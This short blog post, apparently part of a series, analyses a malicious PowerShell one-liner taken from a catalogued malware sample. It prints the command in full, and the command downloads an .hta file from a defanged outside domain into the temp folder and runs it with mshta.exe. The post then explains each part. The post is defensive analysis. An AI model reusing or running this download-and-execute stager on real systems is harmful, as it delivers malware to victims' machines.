Analysis Malicious Powershell ( Part 4 )

In this article, we will briefly analyze the PowerShell script that downloads an hta file.

Malware Sample : https://bazaar.abuse.ch/sample/d8f771c6ae73553fbbbf3d1bd0c19facaf69db4bc9663928789a970ca3e39f8b/.

Malicious Code :

powershell -Command "iwr [http]://booknsvrf[.]com/ -OutFile "$env:TEMP\x.hta"; Start-Process mshta.exe -FilePath "$env:TEMP\x.hta""

Malicious Code Analysis :

1- powershell -Command : Malware Developer uses powershell with a command argument and to execute a specific command .

2- iwr http[://]booknsvrf[.]com/ -OutFile "$env:TEMP\x.hta : Malware Developer uses Invoke-WebRequest to interact with a requesting with a web and download a malicious .hta file . in addition this .hta file will drop into %TEMP% folder .

3- Start-Process mshta.exe -FilePath "$env:TEMP\x.hta"" : Malware Developer start using mshta.exe that is a executable file in windows to run .hta file . in addition with the file path of downloaded .hta file from http[://]booknsvrf[.]com/ .

Reverse The Malware

Analysis Malicious Powershell ( Part 4 )

Comments

Post a Comment